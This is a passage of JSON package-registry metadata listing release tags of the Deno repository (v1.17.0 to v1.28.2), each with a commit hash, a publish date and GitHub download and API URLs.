:"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag